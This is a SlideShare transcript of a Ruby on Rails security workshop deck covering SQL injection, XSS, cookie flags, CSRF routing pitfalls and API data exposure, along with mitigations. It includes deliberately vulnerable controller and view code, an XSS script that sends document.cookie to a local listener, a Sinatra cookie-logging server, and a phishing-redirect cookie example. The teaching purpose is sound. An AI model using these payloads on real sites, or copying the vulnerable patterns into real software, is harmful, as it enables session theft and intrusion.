RoR Workshop - Web applications hacking - Ruby on Rails example
1 like1,890 views
The document discusses web application security, specifically focusing on Ruby on Rails vulnerabilities like SQL injection and XSS attacks, along with best practices for prevention. It emphasizes the importance of sanitizing user inputs, securing APIs, and obtaining code reviews to mitigate risks. Furthermore, it outlines common pitfalls related to CSRF attacks and sensitive data exposure, providing strategies to enhance application security.
![# app/controllers/forum_threads_controller.rb
class ForumThreadsController < ApplicationController
def show
@thread = ForumThread.find_by title: params[:title]
end
end
# config/routes.rb
resources :forum_threads, param: :title, only: :show do
resources :comments, only: :create
end
SEARCHING THE FORUM THREAD BY TITLE:](https://image.slidesharecdn.com/krakyournet2016-hackingrubyonrailsforum-160421122153/85/RoR-Workshop-Web-applications-hacking-Ruby-on-Rails-example-15-320.jpg)
![# app/controllers/forum_threads_controller.rb
class ForumThreadsController < ApplicationController
def show
@thread = ForumThread.find_by “title = #{params[:title]}”
end
end
# config/routes.rb
resources :forum_threads, param: :title, only: :show do
resources :comments, only: :create
end
SEARCHING THE FORUM THREAD BY TITLE:](https://image.slidesharecdn.com/krakyournet2016-hackingrubyonrailsforum-160421122153/85/RoR-Workshop-Web-applications-hacking-Ruby-on-Rails-example-17-320.jpg)
![# app/controllers/comments_controller.rb
class CommentsController < ApplicationController
def create
@thread = ForumThread.find params[:forum_thread_id]
@comments = @thread.comments.build comment_params
@comments.user = current_user
if @comment.save
redirect_to @thread, notice: ‘Successfully added new comment’
else
redirect_to @thread, alert: “Couldn’t save comment“
end
end
private
def comment_params
params.require(:comment).permit(:content)
end
end
# app/views/forum_threads/show.haml
%p= comment.content
COMMENTS - create and show:](https://image.slidesharecdn.com/krakyournet2016-hackingrubyonrailsforum-160421122153/85/RoR-Workshop-Web-applications-hacking-Ruby-on-Rails-example-24-320.jpg)
![# app/controllers/comments_controller.rb
class CommentsController < ApplicationController
def create
@thread = ForumThread.find params[:forum_thread_id]
@comments = @thread.comments.build comment_params
@comments.user = current_user
if @comment.save
redirect_to @thread, notice: ‘Successfully added new comment’
else
redirect_to @thread, alert: “Couldn’t save comment“
end
end
private
def comment_params
params.require(:comment).permit(:content)
end
end
# app/views/forum_threads/show.haml
%p= comment.content.html_safe
COMMENTS - create and show:](https://image.slidesharecdn.com/krakyournet2016-hackingrubyonrailsforum-160421122153/85/RoR-Workshop-Web-applications-hacking-Ruby-on-Rails-example-26-320.jpg)
![require ‘sinatra’
require ‘logger’
logger = Logger.new ‘log/cookies.log’
get ‘/cookies/:cookie’ do
logger.info ‘=== COOKIE ===’
logger.info params[:cookie]
logger.info ‘/== COOKIE ===’
end
XSS ATTACK - SIMPLE COOKIES LOGGING SERVER](https://image.slidesharecdn.com/krakyournet2016-hackingrubyonrailsforum-160421122153/85/RoR-Workshop-Web-applications-hacking-Ruby-on-Rails-example-29-320.jpg)
![cookies[:after_sign_in_path] = ‘http://localhost/after_sign_in_path’
// document.cookies=”after_sign_in_path=’http://malicious.site/phishing’”
cookies.signed[:after_sign_in_path] = ‘http://localhost/after_sign_in_path’
// document.cookies=”after_sign_in_path=’http://malicious.site/phishing’”
cookies.signed[:after_sign_in_path] = {
value: ‘http://localhost/after_sign_in_path’,
httponly: true
}
// finally safe
UNFORTUNATELY - NO. ALWAYS USE THIS HASH!](https://image.slidesharecdn.com/krakyournet2016-hackingrubyonrailsforum-160421122153/85/RoR-Workshop-Web-applications-hacking-Ruby-on-Rails-example-33-320.jpg)
![# app/controllers/comments_controller.rb
class CommentsController < ApplicationController
def create
@thread = ForumThread.find params[:forum_thread_id]
@comments = @thread.comments.build comment_params
@comments.user = current_user
if @comment.save
redirect_to @thread, notice: ‘Successfully added new comment’
else
redirect_to @thread, alert: “Couldn’t save comment“
end
end
private
def comment_params
params.require(:comment).permit(:content)
end
end
# app/views/forum_threads/show.haml
%p= sanitize comment.content.html_safe
COMMENTS - create and show:](https://image.slidesharecdn.com/krakyournet2016-hackingrubyonrailsforum-160421122153/85/RoR-Workshop-Web-applications-hacking-Ruby-on-Rails-example-35-320.jpg)
![[
{
”id”: 2,
”title”: "Curabitur vel vulputate libero.",
”created_at”: "2016-04-18T10:10:40.648Z",
”updated_at”: "2016-04-18T10:10:40.648Z"
},
{
"id": 1,
"title": "Lorem ipsum dolor sit amet.",
"created_at": "2016-04-18T10:10:40.607Z",
"updated_at": "2016-04-18T10:10:40.607Z"
}
]
GENERATED RAILS API - OUTPUT](https://image.slidesharecdn.com/krakyournet2016-hackingrubyonrailsforum-160421122153/85/RoR-Workshop-Web-applications-hacking-Ruby-on-Rails-example-57-320.jpg)
![[
{
”title”: "Curabitur vel vulputate libero."
},
{
"title": "Lorem ipsum dolor sit amet."
}
]
GENERATED RAILS API - SECURED OUTPUT](https://image.slidesharecdn.com/krakyournet2016-hackingrubyonrailsforum-160421122153/85/RoR-Workshop-Web-applications-hacking-Ruby-on-Rails-example-59-320.jpg)
RoR Workshop - Web applications hacking - Ruby on Rails example
- 1. Web applications hacking Ruby on Rails example by Karol Topolski
- 2. ● Software House located in Krakow ● Ruby on Rails, Android and iOS ● Specialized in building web and mobile applications ● Collaborating with many companies and startups from all over the world ABOUT US:
- 3. 2009 - software house was founded 50 projects created 40 employees Awards: OUR HISTORY: Top Web & Software Developers in Poland 2015 Top Tens Ruby on Rails Development Companies
- 4. HOMEAHEAD
- 5. PROEST
- 8. OWASP TOP 10 1. Injection 2. Broken authentication and session management 3. Cross-Site Scripting 4. Insecure direct object reference 5. Security misconfiguration 6. Sensitive data exposure 7. Missing function level access control 8. Cross-Site Request Forgery 9. Using components with known vulnerabilities 10. Unvalidated redirects and forwards
- 10. Simple Ruby on Rails forum Ruby 2.3.0 Rails 4.2.6 PostgreSQL 9.4 https://github.com/railwaymen/hacking-forum.git
- 15. # app/controllers/forum_threads_controller.rb class ForumThreadsController < ApplicationController def show @thread = ForumThread.find_by title: params[:title] end end # config/routes.rb resources :forum_threads, param: :title, only: :show do resources :comments, only: :create end SEARCHING THE FORUM THREAD BY TITLE:
- 17. # app/controllers/forum_threads_controller.rb class ForumThreadsController < ApplicationController def show @thread = ForumThread.find_by “title = #{params[:title]}” end end # config/routes.rb resources :forum_threads, param: :title, only: :show do resources :comments, only: :create end SEARCHING THE FORUM THREAD BY TITLE:
- 20. Is SQL injection impossible in Rails?
- 21. Unfortunately, no. It’s possible, just not dropping tables.
- 24. # app/controllers/comments_controller.rb class CommentsController < ApplicationController def create @thread = ForumThread.find params[:forum_thread_id] @comments = @thread.comments.build comment_params @comments.user = current_user if @comment.save redirect_to @thread, notice: ‘Successfully added new comment’ else redirect_to @thread, alert: “Couldn’t save comment“ end end private def comment_params params.require(:comment).permit(:content) end end # app/views/forum_threads/show.haml %p= comment.content COMMENTS - create and show:
- 26. # app/controllers/comments_controller.rb class CommentsController < ApplicationController def create @thread = ForumThread.find params[:forum_thread_id] @comments = @thread.comments.build comment_params @comments.user = current_user if @comment.save redirect_to @thread, notice: ‘Successfully added new comment’ else redirect_to @thread, alert: “Couldn’t save comment“ end end private def comment_params params.require(:comment).permit(:content) end end # app/views/forum_threads/show.haml %p= comment.content.html_safe COMMENTS - create and show:
- 28. <!-- XSS test --> Hi guys! <script> alert(“I came for your cookies!“) </script> <!-- Time to get some cookies! --> What’s up? <script> xhttp = new XMLHttpRequest(); xhttp.open(“GET”, “http://localhost:4567/cookies/” + document.cookie); xhttp.send(); </script> XSS ATTACK - TEST AND STEALING COOKIES
- 29. require ‘sinatra’ require ‘logger’ logger = Logger.new ‘log/cookies.log’ get ‘/cookies/:cookie’ do logger.info ‘=== COOKIE ===’ logger.info params[:cookie] logger.info ‘/== COOKIE ===’ end XSS ATTACK - SIMPLE COOKIES LOGGING SERVER
- 32. Are all cookies HTTPOnly in Rails?
- 33. cookies[:after_sign_in_path] = ‘http://localhost/after_sign_in_path’ // document.cookies=”after_sign_in_path=’http://malicious.site/phishing’” cookies.signed[:after_sign_in_path] = ‘http://localhost/after_sign_in_path’ // document.cookies=”after_sign_in_path=’http://malicious.site/phishing’” cookies.signed[:after_sign_in_path] = { value: ‘http://localhost/after_sign_in_path’, httponly: true } // finally safe UNFORTUNATELY - NO. ALWAYS USE THIS HASH!
- 34. It’s safe from cookies stealing, but is it safe from XSS?
- 35. # app/controllers/comments_controller.rb class CommentsController < ApplicationController def create @thread = ForumThread.find params[:forum_thread_id] @comments = @thread.comments.build comment_params @comments.user = current_user if @comment.save redirect_to @thread, notice: ‘Successfully added new comment’ else redirect_to @thread, alert: “Couldn’t save comment“ end end private def comment_params params.require(:comment).permit(:content) end end # app/views/forum_threads/show.haml %p= sanitize comment.content.html_safe COMMENTS - create and show:
- 38. # app/controllers/application_controller.rb class ApplicationController < ActionController::Base # Prevent CSRF attacks by raising an exception. # For APIs you may want to use :null_session instead. protect_from_forgery with: :exception end DEFAULT CSRF PROTECTION IN RAILS:
- 40. Is Rails CSRF protection unbreakable?
- 41. HTTP Verbs ● GET ● POST ● PUT ● PATCH ● DELETE ● HEAD ● OPTIONS ● TRACE ● CONNECT
- 42. HTTP Verbs NOT protected by Rails CSRF ● GET ● POST ● PUT ● PATCH ● DELETE ● HEAD ● OPTIONS ● TRACE ● CONNECT
- 43. CSRF pitfall in Rails routing
- 44. # config/routes.rb match ‘/forum_threads/:forum_thread_id/comments/:id/update’, to: ‘comments#update’, via: :all # Rails 4+ CSRF PITFALL IN RAILS ROUTING - MATCH:
- 47. Is Rails CSRF protection 100% safe?
- 48. Yes it is - unless you’re not staying close to Rails guides
- 51. Sensitive data exposure 1. Credentials leaking to public repositories. 2. Lack of proper in-app authorization. 3. Debugging information in production enviroments. 4. Access not restricted, wrong access privileges. 5. Lack of encryption. 6. API responses containing sensitive data.
- 52. Protecting against sensitive data exposure 1. Code reviews. 2. Careful authorization. 3. Strict access. 4. Encryption. 5. API exposing only necessary information.
- 53. Creating the secure API
- 56. # app/controllers/forum_threads_controller.rb def index @threads = ForumThread.order(updated_at: :desc) respond_to do |format| format.html format.json { render json: @threads } end end GENERATED RAILS API
- 57. [ { ”id”: 2, ”title”: "Curabitur vel vulputate libero.", ”created_at”: "2016-04-18T10:10:40.648Z", ”updated_at”: "2016-04-18T10:10:40.648Z" }, { "id": 1, "title": "Lorem ipsum dolor sit amet.", "created_at": "2016-04-18T10:10:40.607Z", "updated_at": "2016-04-18T10:10:40.607Z" } ] GENERATED RAILS API - OUTPUT
- 58. # app/controllers/forum_threads_controller.rb def index @threads = ForumThread.order(updated_at: :desc) respond_to do |format| format.html format.json { render json: @threads.only(:title).to_json } end end GENERATED RAILS API - SECURING THE OUTPUT
- 59. [ { ”title”: "Curabitur vel vulputate libero." }, { "title": "Lorem ipsum dolor sit amet." } ] GENERATED RAILS API - SECURED OUTPUT
- 61. Solutions for building pretty, secure APIs Active Model Serializers ● Object Oriented approach ● Ability to define decorating methods ● All Ruby! ● Flexible ● Easy to test ● Adapter to follow JSON API v1.0 schema ● YARD documented Jbuilder ● Templates approach ● ERblike - might be easy for newcomers ● Flexible ● Hard to test ● No real “adapter” - if you want JSON API v1.0, you have to do it by yourself
- 62. Summary
- 63. Things to remember from this workshop: 1. Never trust anything that comes from user. Params, cookies, headers, everything. Nothing that comes from user is safe to use. 2. Always sanitize your HTML output. Especially when you’re allowing links or images that comes from user. 3. Be careful with match routing. Just don’t use it if you don’t have to. 4. Inspect your outputs. Return only necessary information from your API. 5. Last but not least. Get someone to review your code.
- 64. Thank you for your attention.
- 65. Na zjeździe 11 30-527 Krakow, Poland tel: +48 12 391 60 76 Silicon Valley Acceleration Center. 180 Sansome Street San Francisco, CA 94104 tel: 1-415-449-4791 [email protected] www.railwaymen.org @Railwaymen_org railwaymen.software.development /company/railwaymen